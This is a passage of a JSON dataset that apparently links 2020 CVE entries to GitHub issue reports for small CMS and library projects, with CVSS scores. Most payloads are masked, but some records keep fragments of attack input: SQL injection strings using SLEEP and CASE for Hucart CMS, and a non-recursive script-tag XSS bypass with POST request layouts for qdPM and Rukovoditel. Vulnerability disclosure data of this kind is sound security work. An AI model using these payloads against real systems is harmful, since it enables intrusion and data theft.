  49668. "description": "phpok NUMBERTAG have Some Vulnerability. Variable Overwrite Vulnerability from the Entrance of framework\uff0ci discovered APITAG variable overwrite in APITAG APITAG APITAG we could watch APITAG parameter in APITAG \uff1a APITAG APITAG payload\uff1a APITAG APITAG APITAG Vulnerability to read arbitrary files APITAG APITAG back to the: PATHTAG APITAG APITAG PATHTAG APITAG APITAG there is two file have this vulnerability: payload1: APITAG payload2: APITAG APITAG APITAG APITAG APITAG Arbitrary File Writing to getshell APITAG function In APITAG NUMBERTAG line APITAG APITAG payload: APITAG APITAG APITAG Arbitrary file delete Vulnerability PATHTAG NUMBERTAG APITAG \u51fd\u6570\uff1a APITAG APITAG payload: APITAG APITAG APITAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG",
  49669. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49670. "severity": "HIGH",
  49671. "baseScore": 7.5,
  49672. "impactScore": 3.6,
  49673. "exploitabilityScore": 3.9
  49674. },
  49675. {
  49676. "CVE_ID": "CVE-2020-18442",
  49677. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/68",
  49678. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/68",
  49679. "Repo_new": "gdraheim/zziplib",
  49680. "Issue_Created_At": "2019-03-05T16:45:19Z",
  49681. "description": "error: Incorrect handling of function 'zzip_fread' return value. Hello, I found a bug of zziplib on the lastest commit b NUMBERTAG bc. It's in the function unzzip_cat_file (unzzipcat APITAG , and it is caused by incorrect handling of the return value of the function \u2018zzip_fread\u2019. Relevant code in function unzzip_cat_file in unzzipcat zip.c: ERRORTAG FILETAG Using the POC file, I find that the function zzip_file_read returns NUMBERTAG And it is handled incorrectly in the caller (unzzip_cat_file), which leads to an infinite loop. ERRORTAG",
  49682. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  49683. "severity": "LOW",
  49684. "baseScore": 3.3,
  49685. "impactScore": 1.4,
  49686. "exploitabilityScore": 1.8
  49687. },
  49688. {
  49689. "CVE_ID": "CVE-2020-18445",
  49690. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/8",
  49691. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/8",
  49692. "Repo_new": "doublefast/yunucms",
  49693. "Issue_Created_At": "2019-03-06T08:10:47Z",
  49694. "description": "APITAG Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG \" In the PATHTAG No filtering to id in the upurl( ) function: FILETAG Steps To Reproduce: Open below URL in browser which supports flash. url: URLTAG FILETAG Fix: Filter the url parameter",
  49695. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  49696. "severity": "MEDIUM",
  49697. "baseScore": 6.1,
  49698. "impactScore": 2.7,
  49699. "exploitabilityScore": 2.8
  49700. },
  49701. {
  49702. "CVE_ID": "CVE-2020-18446",
  49703. "Issue_Url_old": "https://github.com/doublefast/yunucms/issues/9",
  49704. "Issue_Url_new": "https://github.com/doublefast/yunucms/issues/9",
  49705. "Repo_new": "doublefast/yunucms",
  49706. "Issue_Created_At": "2019-03-07T05:39:20Z",
  49707. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" URLTAG \" In the PATHTAG filtering to param in the APITAG ) function: FILETAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG content FILETAG APITAG refresh vulnerability trigger point FILETAG Fix: Filter the param parameter",
  49708. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49709. "severity": "MEDIUM",
  49710. "baseScore": 4.8,
  49711. "impactScore": 2.7,
  49712. "exploitabilityScore": 1.7
  49713. },
  49714. {
  49715. "CVE_ID": "CVE-2020-18451",
  49716. "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/2",
  49717. "Issue_Url_new": "https://github.com/autismjh/damicms/issues/2",
  49718. "Repo_new": "autismjh/damicms",
  49719. "Issue_Created_At": "2019-03-13T02:09:44Z",
  49720. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG No filtering to title in the APITAG function: FILETAG Vulnerability trigger point URLTAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG content FILETAG FILETAG APITAG refresh vulnerability trigger point FILETAG Fix: Filter the title parameter.",
  49721. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49722. "severity": "MEDIUM",
  49723. "baseScore": 4.8,
  49724. "impactScore": 2.7,
  49725. "exploitabilityScore": 1.7
  49726. },
  49727. {
  49728. "CVE_ID": "CVE-2020-18454",
  49729. "Issue_Url_old": "https://github.com/hillerlin/bycms/issues/1",
  49730. "Issue_Url_new": "https://github.com/hillerlin/bycms/issues/1",
  49731. "Repo_new": "hillerlin/bycms",
  49732. "Issue_Created_At": "2019-03-13T09:08:37Z",
  49733. "description": "Bug NUMBERTAG Cross site request forgery. There is an Stored Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: FILETAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG APITAG page has changed FILETAG",
  49734. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  49735. "severity": "MEDIUM",
  49736. "baseScore": 6.8,
  49737. "impactScore": 5.9,
  49738. "exploitabilityScore": 0.9
  49739. },
  49740. {
  49741. "CVE_ID": "CVE-2020-18455",
  49742. "Issue_Url_old": "https://github.com/hillerlin/bycms/issues/2",
  49743. "Issue_Url_new": "https://github.com/hillerlin/bycms/issues/2",
  49744. "Repo_new": "hillerlin/bycms",
  49745. "Issue_Created_At": "2019-03-21T06:55:11Z",
  49746. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG No filtering to title in the edit( ) function: FILETAG Vulnerability trigger point FILETAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG FILETAG APITAG content FILETAG APITAG the refresh vulnerability trigger point FILETAG Fix: Filter the title parameter",
  49747. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49748. "severity": "MEDIUM",
  49749. "baseScore": 4.8,
  49750. "impactScore": 2.7,
  49751. "exploitabilityScore": 1.7
  49752. },
  49753. {
  49754. "CVE_ID": "CVE-2020-18456",
  49755. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/4",
  49756. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/4",
  49757. "Repo_new": "pbootcms/pbootcms",
  49758. "Issue_Created_At": "2019-04-09T01:42:25Z",
  49759. "description": "Bug NUMBERTAG Cross Site Scripting Vulnerability. There is an Stored Cross Site Scripting vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG No filtering to title in the mod( ) function: FILETAG FILETAG Vulnerability trigger point\uff1a URLTAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG NUMBERTAG modify content FILETAG FILETAG APITAG refresh vulnerability trigger point FILETAG Fix: Filter the title parameter",
  49760. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49761. "severity": "MEDIUM",
  49762. "baseScore": 4.8,
  49763. "impactScore": 2.7,
  49764. "exploitabilityScore": 1.7
  49765. },
  49766. {
  49767. "CVE_ID": "CVE-2020-18457",
  49768. "Issue_Url_old": "https://github.com/hillerlin/bycms/issues/3",
  49769. "Issue_Url_new": "https://github.com/hillerlin/bycms/issues/3",
  49770. "Repo_new": "hillerlin/bycms",
  49771. "Issue_Created_At": "2019-04-10T02:43:41Z",
  49772. "description": "Bug NUMBERTAG Cross site request forgery. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: FILETAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG FILETAG APITAG page has changed FILETAG",
  49773. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  49774. "severity": "MEDIUM",
  49775. "baseScore": 6.8,
  49776. "impactScore": 5.9,
  49777. "exploitabilityScore": 0.9
  49778. },
  49779. {
  49780. "CVE_ID": "CVE-2020-18458",
  49781. "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/5",
  49782. "Issue_Url_new": "https://github.com/autismjh/damicms/issues/5",
  49783. "Repo_new": "autismjh/damicms",
  49784. "Issue_Created_At": "2019-04-15T08:36:56Z",
  49785. "description": "Bug NUMBERTAG Cross site request forgery. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: URLTAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG FILETAG",
  49786. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  49787. "severity": "HIGH",
  49788. "baseScore": 8.0,
  49789. "impactScore": 5.9,
  49790. "exploitabilityScore": 2.1
  49791. },
  49792. {
  49793. "CVE_ID": "CVE-2020-18462",
  49794. "Issue_Url_old": "https://github.com/Richard1266/aikcms/issues/1",
  49795. "Issue_Url_new": "https://github.com/richard1266/aikcms/issues/1",
  49796. "Repo_new": "richard1266/aikcms",
  49797. "Issue_Created_At": "2019-04-29T06:40:30Z",
  49798. "description": "Bug NUMBERTAG File upload vulnerability. There is an File upload vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" In the PATHTAG checksum filtering of file extensions of uploaded files\uff1a FILETAG APITAG in as admin FILETAG APITAG this part FILETAG APITAG and capture the change suffix name FILETAG FILETAG FILETAG APITAG FILETAG",
  49799. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  49800. "severity": "HIGH",
  49801. "baseScore": 7.2,
  49802. "impactScore": 5.9,
  49803. "exploitabilityScore": 1.2
  49804. },
  49805. {
  49806. "CVE_ID": "CVE-2020-18463",
  49807. "Issue_Url_old": "https://github.com/Richard1266/aikcms/issues/2",
  49808. "Issue_Url_new": "https://github.com/richard1266/aikcms/issues/2",
  49809. "Repo_new": "richard1266/aikcms",
  49810. "Issue_Created_At": "2019-04-29T07:07:17Z",
  49811. "description": "Bug NUMBERTAG Cross site request forgery. There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: FILETAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG the package to generate a POC file and run it FILETAG FILETAG FILETAG APITAG page has changed FILETAG",
  49812. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
  49813. "severity": "LOW",
  49814. "baseScore": 2.4,
  49815. "impactScore": 1.4,
  49816. "exploitabilityScore": 0.9
  49817. },
  49818. {
  49819. "CVE_ID": "CVE-2020-18467",
  49820. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/364",
  49821. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/364",
  49822. "Repo_new": "bigtreecms/bigtree-cms",
  49823. "Issue_Created_At": "2019-04-09T10:02:27Z",
  49824. "description": "APITAG CMS NUMBERTAG There is a a Stored XSS which can allows remote attackers to inject arbitrary code. APITAG CMS version NUMBERTAG suffers from a cross site scripting vulnerability. After the administrator logged in, Add Tag which can allows remote attackers to inject arbitrary code NUMBERTAG poc: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG bigtree_admin FILETAG NUMBERTAG when administrator access Tags FILETAG",
  49825. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49826. "severity": "MEDIUM",
  49827. "baseScore": 5.4,
  49828. "impactScore": 2.7,
  49829. "exploitabilityScore": 2.3
  49830. },
  49831. {
  49832. "CVE_ID": "CVE-2020-18468",
  49833. "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/2",
  49834. "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/2",
  49835. "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
  49836. "Issue_Created_At": "2019-04-12T07:54:24Z",
  49837. "description": "Persistent XSS on APITAG NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG field found in the APITAG Page\" page under the APITAG menu in APITAG NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG APITAG administrator loggin POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"type\" login NUMBERTAG Content Disposition: form data; name=\"cfg FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  49838. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49839. "severity": "MEDIUM",
  49840. "baseScore": 5.4,
  49841. "impactScore": 2.7,
  49842. "exploitabilityScore": 2.3
  49843. },
  49844. {
  49845. "CVE_ID": "CVE-2020-18469",
  49846. "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/3",
  49847. "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/3",
  49848. "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
  49849. "Issue_Created_At": "2019-04-12T09:34:42Z",
  49850. "description": "Persistent XSS on Rukovoditel NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG of application\" field found in the APITAG Configuration\" page in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG of application\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG When an unauthenticated user visits the page, the code gets executed: FILETAG NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG Text\" field found in the APITAG page under the APITAG menu in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG Text\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"form_session_token\" APITAG NUMBERTAG Content Disposition: form data; name=\"CFG FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  49851. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49852. "severity": "MEDIUM",
  49853. "baseScore": 5.4,
  49854. "impactScore": 2.7,
  49855. "exploitabilityScore": 2.3
  49856. },
  49857. {
  49858. "CVE_ID": "CVE-2020-18469",
  49859. "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/5",
  49860. "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/5",
  49861. "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
  49862. "Issue_Created_At": "2019-04-12T14:40:19Z",
  49863. "description": "Persistent XSS on Rukovoditel NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG Text\" field found in the APITAG page under the APITAG menu in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG Text\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"form_session_token\" APITAG NUMBERTAG Content Disposition: form data; name=\"CFG FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  49864. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49865. "severity": "MEDIUM",
  49866. "baseScore": 5.4,
  49867. "impactScore": 2.7,
  49868. "exploitabilityScore": 2.3
  49869. },
  49870. {
  49871. "CVE_ID": "CVE-2020-18470",
  49872. "Issue_Url_old": "https://github.com/joelister/Persistent-XSS-on-qdPM-9.1/issues/4",
  49873. "Issue_Url_new": "https://github.com/joelister/persistent-xss-on-qdpm-9.1/issues/4",
  49874. "Repo_new": "joelister/persistent-xss-on-qdpm-9.1",
  49875. "Issue_Created_At": "2019-04-12T14:32:58Z",
  49876. "description": "Persistent XSS on Rukovoditel NUMBERTAG Stored cross site scripting (XSS) vulnerability in the APITAG of application\" field found in the APITAG Configuration\" page in Rukovoditel NUMBERTAG allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to PATHTAG This vulnerability is specifically the APITAG of application\" field. I noticed that it does strip off the tags APITAG and APITAG however, it isn't recursive. By entering this payload: \"> APITAG pt>alert NUMBERTAG APITAG // Javascript gets executed. Here's an output of the mentioned payload when entered and saved. FILETAG POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG When an unauthenticated user visits the page, the code gets executed: FILETAG There may be more but I believe this can be fixed by recursively stripping out the tags APITAG and APITAG",
  49877. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49878. "severity": "MEDIUM",
  49879. "baseScore": 5.4,
  49880. "impactScore": 2.7,
  49881. "exploitabilityScore": 2.3
  49882. },
  49883. {
  49884. "CVE_ID": "CVE-2020-18475",
  49885. "Issue_Url_old": "https://github.com/joelister/bug/issues/7",
  49886. "Issue_Url_new": "https://github.com/joelister/bug/issues/7",
  49887. "Repo_new": "joelister/bug",
  49888. "Issue_Created_At": "2019-04-30T09:27:01Z",
  49889. "description": "Persistent XSS on 'mes_title' field. APITAG first user inserts a malicious script into the header field of the outbox and sends it to other users. FILETAG APITAG other users open the email, the malicious code will be executed. FILETAG NUMBERTAG exp code\uff1a POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG",
  49890. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49891. "severity": "MEDIUM",
  49892. "baseScore": 5.4,
  49893. "impactScore": 2.7,
  49894. "exploitabilityScore": 2.3
  49895. },
  49896. {
  49897. "CVE_ID": "CVE-2020-18476",
  49898. "Issue_Url_old": "https://github.com/joelister/bug/issues/9",
  49899. "Issue_Url_new": "https://github.com/joelister/bug/issues/9",
  49900. "Repo_new": "joelister/bug",
  49901. "Issue_Created_At": "2019-04-30T09:57:02Z",
  49902. "description": "SQL injection vulnerability in the \u201ccon_content\u201d field of Hucart cms NUMBERTAG After the user logs in, Hucart cms NUMBERTAG does not securely filter the avatar \"usd_image\" field in the basic information, resulting in a SQL injection vulnerability. FILETAG APITAG current page capture is as follows: POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"usd_nick NUMBERTAG Content Disposition: form data; name=\"usd_image NUMBERTAG Content Disposition: form data; name=\"usd_truename NUMBERTAG Content Disposition: form data; name=\"usd_birthday NUMBERTAG Content Disposition: form data; name=\"usd_salt NUMBERTAG Content Disposition: form data; name=\"usd_msn\" EMAILTAG NUMBERTAG Content Disposition: form data; name=\"usd_qq NUMBERTAG Content Disposition: form data; name=\"usd_officephone NUMBERTAG Content Disposition: form data; name=\"usd_homephone NUMBERTAG Content Disposition: form data; name=\"usd_tel NUMBERTAG Content Disposition: form data; name=\"province NUMBERTAG Content Disposition: form data; name=\"city NUMBERTAG Content Disposition: form data; name=\"district NUMBERTAG Content Disposition: form data; name=\"pcd_all NUMBERTAG Content Disposition: form data; name=\"usd_address NUMBERTAG exp code: payload1:' WHERE NUMBERTAG AND NUMBERTAG SELECT (CASE WHEN NUMBERTAG THEN NUMBERTAG ELSE (SELECT NUMBERTAG UNION SELECT NUMBERTAG END)) APITAG payload2:' WHERE NUMBERTAG RLIKE SLEEP NUMBERTAG APITAG FILETAG",
  49903. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  49904. "severity": "HIGH",
  49905. "baseScore": 8.8,
  49906. "impactScore": 5.9,
  49907. "exploitabilityScore": 2.8
  49908. },
  49909. {
  49910. "CVE_ID": "CVE-2020-18477",
  49911. "Issue_Url_old": "https://github.com/joelister/bug/issues/8",
  49912. "Issue_Url_new": "https://github.com/joelister/bug/issues/8",
  49913. "Repo_new": "joelister/bug",
  49914. "Issue_Created_At": "2019-04-30T09:42:52Z",
  49915. "description": "SQL injection vulnerability in the \u201ccon_content\u201d field of Hucart cms NUMBERTAG APITAG the user logs in, Hucart cms NUMBERTAG does not securely filter the message content \"con_content\" field in APITAG Consultation\", resulting in a SQL injection vulnerability. FILETAG APITAG current page capture is as follows POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG NUMBERTAG exp code Payload: con_title NUMBERTAG con_content= APITAG NUMBERTAG APITAG '||(SELECT NUMBERTAG d NUMBERTAG c FROM DUAL WHERE NUMBERTAG AND NUMBERTAG submit= %E NUMBERTAG F NUMBERTAG E4%BA%A4 FILETAG",
  49916. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  49917. "severity": "HIGH",
  49918. "baseScore": 8.8,
  49919. "impactScore": 5.9,
  49920. "exploitabilityScore": 2.8
  49921. },
  49922. {
  49923. "CVE_ID": "CVE-2020-18544",
  49924. "Issue_Url_old": "https://github.com/FeMiner/wms/issues/5",
  49925. "Issue_Url_new": "https://github.com/feminer/wms/issues/5",
  49926. "Repo_new": "feminer/wms",
  49927. "Issue_Created_At": "2019-03-07T13:19:28Z",
  49928. "description": "SQL Injection vulnerability in FILETAG !!!. A critical SQL Injection vulnerability was found in APITAG The parameter \"username\" is passed without filtering to SQL sentence which causes the vulnerability. Hackers can exploit it without authority to get access to your database FILETAG",
  49929. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49930. "severity": "CRITICAL",
  49931. "baseScore": 9.8,
  49932. "impactScore": 5.9,
  49933. "exploitabilityScore": 3.9
  49934. },
  49935. {
  49936. "CVE_ID": "CVE-2020-18646",
  49937. "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/5",
  49938. "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/5",
  49939. "Repo_new": "PearlyNautilus/Security-Code-Review",
  49940. "Issue_Created_At": "2019-03-11T08:50:10Z",
  49941. "description": "APITAG APITAG Disclosure Vuln. There are two Path Disclosure Vulnerabilities. Download: URLTAG NUMBERTAG Root path disclosure. Visit \" URLTAG \" to install it step by step, the installation is complete and then we can find root path as follows: FILETAG FILETAG view source: FILETAG NUMBERTAG Web path disclosure. URLTAG URLTAG FILETAG FILETAG",
  49942. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49943. "severity": "HIGH",
  49944. "baseScore": 7.5,
  49945. "impactScore": 3.6,
  49946. "exploitabilityScore": 3.9
  49947. },
  49948. {
  49949. "CVE_ID": "CVE-2020-18648",
  49950. "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/7",
  49951. "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/7",
  49952. "Repo_new": "PearlyNautilus/Security-Code-Review",
  49953. "Issue_Created_At": "2019-03-12T10:00:51Z",
  49954. "description": "APITAG NUMBERTAG CSRF Vuln. There is a CSRF vulnerability in APITAG NUMBERTAG endor: FILETAG EXP CODETAG Demo FILETAG FILETAG Fix Add a Token authentication...",
  49955. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  49956. "severity": "HIGH",
  49957. "baseScore": 8.8,
  49958. "impactScore": 5.9,
  49959. "exploitabilityScore": 2.8
  49960. },
  49961. {
  49962. "CVE_ID": "CVE-2020-18648",
  49963. "Issue_Url_old": "https://github.com/GodEpic/JuQingCMS/issues/1",
  49964. "Issue_Url_new": "https://github.com/godepic/juqingcms/issues/1",
  49965. "Repo_new": "godepic/juqingcms",
  49966. "Issue_Created_At": "2019-03-14T08:21:02Z",
